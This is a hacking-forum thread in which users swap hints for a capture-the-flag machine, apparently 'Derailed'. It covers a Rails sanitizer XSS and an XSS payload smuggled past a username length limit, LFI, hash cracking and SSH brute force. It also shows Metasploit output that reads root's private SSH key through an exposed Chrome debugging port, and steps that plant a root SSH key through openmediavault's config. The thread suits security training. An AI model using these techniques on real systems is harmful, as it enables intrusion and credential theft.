Posts: 16 Threads: 0 Joined: N/A November 22, 2022 at 10:18 PM (November 22, 2022, 08:40 PM)meowmeowattack Wrote: regarding xss for the entry point. i can find this information so far: rails-html-sanitizer 1.4.2 is vulnerable to cross-site scripting when `select` and `style` tags are allowed (CVE-2022-32209). it does look exploitable, but with the cookie being httponly, and there doesn't see to be any user role changing form, i fail to think of how this would help in this exercise. there's an /administration endpoint, not sure whether this vuln would allow us to fetch the content of that and post it to our server, from what I've read in the report on hackerone it should? I also noticed https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-site-scripting-xss this section mentions rich text editors... coincidentally, this challenge offers one too, but I'm kind of tired of all this guesswork at this point, it makes me think I'm just going down a huge rabbit hole. Posts: 78 Threads: 0 Joined: N/A November 22, 2022 at 11:08 PM (November 22, 2022, 10:18 PM)ILoveNSA Wrote: (November 22, 2022, 08:40 PM)meowmeowattack Wrote: regarding xss for the entry point. i can find this information so far: rails-html-sanitizer 1.4.2 is vulnerable to cross-site scripting when `select` and `style` tags are allowed (CVE-2022-32209). it does look exploitable, but with the cookie being httponly, and there doesn't see to be any user role changing form, i fail to think of how this would help in this exercise.
there's an /administration endpoint, not sure whether this vuln would allow us to fetch the content of that and post it to our server, from what I've read in the report on hackerone it should?
I also noticed https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-site-scripting-xss this section mentions rich text editors... coincidentally, this challenge offers one too, but I'm kind of tired of all this guesswork at this point, it makes me think I'm just going down a huge rabbit hole. while still having the unintended way in, i copied the development.log from the target, which shows how alice logs in and visits the pages. where you can see that this alice browses to the login page, then login and then just landed on the landing page that renders the clipnotes pad. from the logs, i don't think alice is viewing any notes or reports we submit. i start to feel the concept of xss might be a rabbit hole. Started GET "/login" for 127.0.0.1 at 2022-11-21 16:15:10 -0500
Processing by SessionsController#new as HTML
Rendering layout layouts/application.html.erb
Rendering sessions/new.html.erb within layouts/application
Rendered sessions/new.html.erb within layouts/application (Duration: 0.9ms | Allocations: 467)
[Webpacker] Everything's up-to-date. Nothing to do
�[1m�[36mUser Load (0.2ms)�[0m �[1m�[34mSELECT "users".* FROM "users" WHERE "users"."id" = ? LIMIT ?�[0m [["id", 1], ["LIMIT", 1]]
↳ app/controllers/application_controller.rb:15:in `is_admin?'
Rendered layout layouts/application.html.erb (Duration: 5.6ms | Allocations: 2267)
Completed 200 OK in 7ms (Views: 5.9ms | ActiveRecord: 0.2ms | Allocations: 2683)
Started POST "/login" for 127.0.0.1 at 2022-11-21 16:15:11 -0500
Processing by SessionsController#create as HTML
Parameters: {"authenticity_token"=>"[FILTERED]", "session"=>{"username"=>"alice", "password"=>"[FILTERED]"}, "button"=>""}
�[1m�[36mUser Load (0.1ms)�[0m �[1m�[34mSELECT "users".* FROM "users" WHERE "users"."username" = ? LIMIT ?�[0m [["username", "alice"], ["LIMIT", 1]]
↳ app/controllers/sessions_controller.rb:11:in `create'
Redirected to http://derailed.htb:3003/
Completed 302 Found in 266ms (ActiveRecord: 0.1ms | Allocations: 806)
Started GET "/" for 127.0.0.1 at 2022-11-21 16:15:11 -0500
Processing by NotesController#new as HTML
Rendering layout layouts/application.html.erb
Rendering notes/new.html.erb within layouts/application
Rendered notes/new.html.erb within layouts/application (Duration: 0.6ms | Allocations: 247)
[Webpacker] Everything's up-to-date. Nothing to do
�[1m�[36mUser Load (0.1ms)�[0m �[1m�[34mSELECT "users".* FROM "users" WHERE "users"."id" = ? LIMIT ?�[0m [["id", 1], ["LIMIT", 1]]
↳ app/controllers/application_controller.rb:15:in `is_admin?'
Rendered layout layouts/application.html.erb (Duration: 4.2ms | Allocations: 2047)
Completed 200 OK in 5ms (Views: 4.6ms | ActiveRecord: 0.1ms | Allocations: 2469)
Posts: 7 Threads: 0 Joined: N/A November 23, 2022 at 2:10 AM (November 22, 2022, 03:49 PM)s0jnik Wrote: now start from scratch
Do you have a entry point already? Not yet, I'm about to start now Posts: 78 Threads: 0 Joined: N/A November 23, 2022 at 2:17 AM (November 22, 2022, 05:45 AM)deer Wrote: (November 21, 2022, 07:48 PM)toinkz Wrote: How did the recently patched unintended privilege escalation Chrome Driver root work?
it is not patched still
(November 22, 2022, 04:43 AM)meowmeowattack Wrote: (November 21, 2022, 09:32 PM)nuki Wrote: Exa Wrote:I found the LFI. Any hint on what to do next?
Edit: I found development.sqlite3.
Cracking the hash of toby works pretty well, unfortunately it doesn't lead anywhere.
I already tried bruteforcing the ssh login for the user associated to toby with a list of album names and artists from https://en.wikipedia.org/wiki/Toby_Wright
No success so far for the last couple of hours
the cracked hash can be used to login as openmediavault-webgui, but there doesn't seem to be anything exploitable by examining the version
in the /etc/openmediavault/config.xml, it does highlight two users, one does exist on the filesystem, one doesn't
if you have an ssh as openmediavault-webgui, I offer you a couple nudges
/usr/sbin/omv-firstaid
127.0.0.1:80 after recent changes, resetting admin password using /usr/sbin/omv-firstaid no longer works Posts: 7 Threads: 0 Joined: N/A November 23, 2022 at 3:54 AM (November 23, 2022, 02:17 AM)meowmeowattack Wrote: (November 22, 2022, 05:45 AM)deer Wrote: (November 21, 2022, 07:48 PM)toinkz Wrote: How did the recently patched unintended privilege escalation Chrome Driver root work?
it is not patched still
(November 22, 2022, 04:43 AM)meowmeowattack Wrote: (November 21, 2022, 09:32 PM)nuki Wrote: Exa Wrote:I found the LFI. Any hint on what to do next?
Edit: I found development.sqlite3.
Cracking the hash of toby works pretty well, unfortunately it doesn't lead anywhere.
I already tried bruteforcing the ssh login for the user associated to toby with a list of album names and artists from https://en.wikipedia.org/wiki/Toby_Wright
No success so far for the last couple of hours
the cracked hash can be used to login as openmediavault-webgui, but there doesn't seem to be anything exploitable by examining the version
in the /etc/openmediavault/config.xml, it does highlight two users, one does exist on the filesystem, one doesn't
if you have an ssh as openmediavault-webgui, I offer you a couple nudges
/usr/sbin/omv-firstaid
127.0.0.1:80
after recent changes, resetting admin password using /usr/sbin/omv-firstaid no longer works how did you get in Posts: 28 Threads: 0 Joined: N/A November 23, 2022 at 4:06 AM (November 23, 2022, 02:17 AM)meowmeowattack Wrote: (November 22, 2022, 05:45 AM)deer Wrote: (November 21, 2022, 07:48 PM)toinkz Wrote: How did the recently patched unintended privilege escalation Chrome Driver root work?
it is not patched still
(November 22, 2022, 04:43 AM)meowmeowattack Wrote: (November 21, 2022, 09:32 PM)nuki Wrote: Exa Wrote:I found the LFI. Any hint on what to do next?
Edit: I found development.sqlite3.
Cracking the hash of toby works pretty well, unfortunately it doesn't lead anywhere.
I already tried bruteforcing the ssh login for the user associated to toby with a list of album names and artists from https://en.wikipedia.org/wiki/Toby_Wright
No success so far for the last couple of hours
the cracked hash can be used to login as openmediavault-webgui, but there doesn't seem to be anything exploitable by examining the version
in the /etc/openmediavault/config.xml, it does highlight two users, one does exist on the filesystem, one doesn't
if you have an ssh as openmediavault-webgui, I offer you a couple nudges
/usr/sbin/omv-firstaid
127.0.0.1:80
after recent changes, resetting admin password using /usr/sbin/omv-firstaid no longer works Looks like the patches finally went into effect.For those who asked about the chrome debugger privesc...netstat showed a few high numbered ports on localhost. Curling them returned some chrome debug info. Additionally, pspy showed root running several processes like/usr/bin/google-chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-gpu --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --headless --incognito --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.com.google.Chrome.bmAxEF data:,Well, you could use auxiliary/gather/chrome_debugger in metasploit to fetch any file you wanted like /root/root.txt or /root/.ssh/id_rsa from the remote machine as long as you forwarded the correct port.It would work like this:Module options (auxiliary/gather/chrome_debugger):
Name Current Setting Required Description FILEPATH /root/.ssh/id_rsa no File to fetch from remote machine. RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 38541 yes The target port (TCP) TIMEOUT 10 yes Time to wait for response URL no Url to fetch from remote machine.msf6 auxiliary(gather/chrome_debugger) > run[*] Running module against 127.0.0.1[*] Attempting Connection to ws://127.0.0.1:38541/devtools/page/E5DA28A5144336BC1B01J0A4358641C54[*] Opened connection[*] Attempting to load url file:///root/.ssh/id_rsa[*] Received Data[*] Sending request for data[*] Received Data[*] Stored file:///root/.ssh/id_rsa at /home/kali/.msf4/loot/20221120020124_default_127.0.0.1_chrome.debugger._797813.txt[*] Auxiliary module execution completedPosts: 78 Threads: 0 Joined: N/A November 23, 2022 at 4:18 AM got root, user flag was through the previously unpatched mass assignment. i haven't quite figured out how to achieve it via the intended approach though. the way i could still get in was because i copied all files under /var/www/ prior to the patch coming in effect. in the /var/www/rails-app folder, there is a git repo, and once of the git log contains alice's password. So, i got admin to the web there. for root, you don't need to use omv-firstaid at all. follow this link to get the correct format of ssh public key:https://forum.openmediavault.org/index.php?thread/7822-guide-enable-ssh-with-public-key-authentication-securing-remote-webui-access-to/ then create a new user entry in the omv config.xml for the user root. then use /usr/sbin/omv-rpc to force apply the changes. then you can login as root using your private key anyone able to succeed the foothold part using the intended way, please share There is a marcus user that browses the notes, the relevant code is like this with sqlite3.connect(DB) as conn:
cur = conn.cursor()
cur.execute("SELECT * FROM reports")
rows = cur.fetchall()
if not rows:
print("nothing here.")
else:
for row in rows:
try:
id = str(row[0])
note_id = str(row[1])
print(f"delete {id} - {note_id} from reports")
sql = 'DELETE FROM reports WHERE id=?'
cur = conn.cursor()
cur.execute(sql, (id,))
conn.commit()
print(f"visitting {id}")
driver.execute_script("window.open('');")
driver.switch_to.window(driver.window_handles[-1])
#driver.set_page_load_timeout(30)
sleep(10)
driver.get(url +"/clipnotes/" + note_id)
sleep(30)
except Exception as e:
print(str(e))
Posts: 0 Threads: 0 Joined: N/A November 23, 2022 at 5:33 AM (November 23, 2022, 04:18 AM)meowmeowattack Wrote: got root, user flag was through the previously unpatched mass assignment. i haven't quite figured out how to achieve it via the intended approach though.
the way i could still get in was because i copied all files under /var/www/ prior to the patch coming in effect. in the /var/www/rails-app folder, there is a git repo, and once of the git log contains alice's password. So, i got admin to the web there.
for root, you don't need to use omv-firstaid at all. follow this link to get the correct format of ssh public key:https://forum.openmediavault.org/index.php?thread/7822-guide-enable-ssh-with-public-key-authentication-securing-remote-webui-access-to/
then create a new user entry in the omv config.xml for the user root.
then use /usr/sbin/omv-rpc to force apply the changes. then you can login as root using your private key
anyone able to succeed the foothold part using the intended way, please share
There is a marcus user that browses the notes, the relevant code is like this
with sqlite3.connect(DB) as conn:
cur = conn.cursor()
cur.execute("SELECT * FROM reports")
rows = cur.fetchall()
if not rows:
print("nothing here.")
else:
for row in rows:
try:
id = str(row[0])
note_id = str(row[1])
print(f"delete {id} - {note_id} from reports")
sql = 'DELETE FROM reports WHERE id=?'
cur = conn.cursor()
cur.execute(sql, (id,))
conn.commit()
print(f"visitting {id}")
driver.execute_script("window.open('');")
driver.switch_to.window(driver.window_handles[-1])
#driver.set_page_load_timeout(30)
sleep(10)
driver.get(url +"/clipnotes/" + note_id)
sleep(30)
except Exception as e:
print(str(e))
What is Alice password? Posts: 28 Threads: 0 Joined: N/A November 23, 2022 at 5:58 AM (November 23, 2022, 04:18 AM)meowmeowattack Wrote: got root, user flag was through the previously unpatched mass assignment. i haven't quite figured out how to achieve it via the intended approach though.
the way i could still get in was because i copied all files under /var/www/ prior to the patch coming in effect. in the /var/www/rails-app folder, there is a git repo, and once of the git log contains alice's password. So, i got admin to the web there.
for root, you don't need to use omv-firstaid at all. follow this link to get the correct format of ssh public key:https://forum.openmediavault.org/index.php?thread/7822-guide-enable-ssh-with-public-key-authentication-securing-remote-webui-access-to/
then create a new user entry in the omv config.xml for the user root.
then use /usr/sbin/omv-rpc to force apply the changes. then you can login as root using your private key
anyone able to succeed the foothold part using the intended way, please share
There is a marcus user that browses the notes, the relevant code is like this
with sqlite3.connect(DB) as conn:
cur = conn.cursor()
cur.execute("SELECT * FROM reports")
rows = cur.fetchall()
if not rows:
print("nothing here.")
else:
for row in rows:
try:
id = str(row[0])
note_id = str(row[1])
print(f"delete {id} - {note_id} from reports")
sql = 'DELETE FROM reports WHERE id=?'
cur = conn.cursor()
cur.execute(sql, (id,))
conn.commit()
print(f"visitting {id}")
driver.execute_script("window.open('');")
driver.switch_to.window(driver.window_handles[-1])
#driver.set_page_load_timeout(30)
sleep(10)
driver.get(url +"/clipnotes/" + note_id)
sleep(30)
except Exception as e:
print(str(e))
Have not succeeded on the intended foothold method yet, but I am having some promising results so far. The username field when you register will only take 40 chars client side, but you can intercept this request and send more, like 48 chars plus xss payload (url encode entire string). Then you can login with the entire url-decoded string, create empty new clipnote, and xss should execute. Posts: 6 Threads: 0 Joined: N/A November 23, 2022 at 6:48 AM (November 23, 2022, 04:18 AM)meowmeowattack Wrote: got root, user flag was through the previously unpatched mass assignment. i haven't quite figured out how to achieve it via the intended approach though.
the way i could still get in was because i copied all files under /var/www/ prior to the patch coming in effect. in the /var/www/rails-app folder, there is a git repo, and once of the git log contains alice's password. So, i got admin to the web there.
for root, you don't need to use omv-firstaid at all. follow this link to get the correct format of ssh public key:https://forum.openmediavault.org/index.php?thread/7822-guide-enable-ssh-with-public-key-authentication-securing-remote-webui-access-to/
then create a new user entry in the omv config.xml for the user root.
then use /usr/sbin/omv-rpc to force apply the changes. then you can login as root using your private key
anyone able to succeed the foothold part using the intended way, please share
There is a marcus user that browses the notes, the relevant code is like this
with sqlite3.connect(DB) as conn:
cur = conn.cursor()
cur.execute("SELECT * FROM reports")
rows = cur.fetchall()
if not rows:
print("nothing here.")
else:
for row in rows:
try:
id = str(row[0])
note_id = str(row[1])
print(f"delete {id} - {note_id} from reports")
sql = 'DELETE FROM reports WHERE id=?'
cur = conn.cursor()
cur.execute(sql, (id,))
conn.commit()
print(f"visitting {id}")
driver.execute_script("window.open('');")
driver.switch_to.window(driver.window_handles[-1])
#driver.set_page_load_timeout(30)
sleep(10)
driver.get(url +"/clipnotes/" + note_id)
sleep(30)
except Exception as e:
print(str(e))
Did you also encode the sshpubkey in config.xml in any way? RFC4716 format won't be taken and ends in error with stack trace. |
